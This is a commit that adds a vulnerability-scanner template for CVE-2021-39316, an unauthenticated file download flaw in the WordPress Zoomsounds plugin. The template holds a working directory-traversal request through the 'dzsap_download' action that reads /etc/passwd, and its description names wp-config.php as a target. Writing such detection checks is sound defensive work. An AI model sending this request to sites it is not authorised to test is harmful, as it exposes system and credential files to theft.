Merge pull request #2738 from daffainfo/patch-228

Create CVE-2021-39316.yaml
2021-09-23 11:37:42 +05:30 · 2021-09-23 11:37:42 +05:30 · 97c939ad08
parent 58ca327e55 e3dc2ef1ec
commit 97c939ad08
1 changed files with 27 additions and 0 deletions
--- a/cves/2021/CVE-2021-39316.yaml
+++ b/cves/2021/CVE-2021-39316.yaml
@ -0,0 +1,27 @@
+id: CVE-2021-39316
+
+info:
+  name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
+  author: daffainfo
+  severity: high
+  description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
+  reference:
+    - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
+  tags: wordpress,cve2021,cve,lfi,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200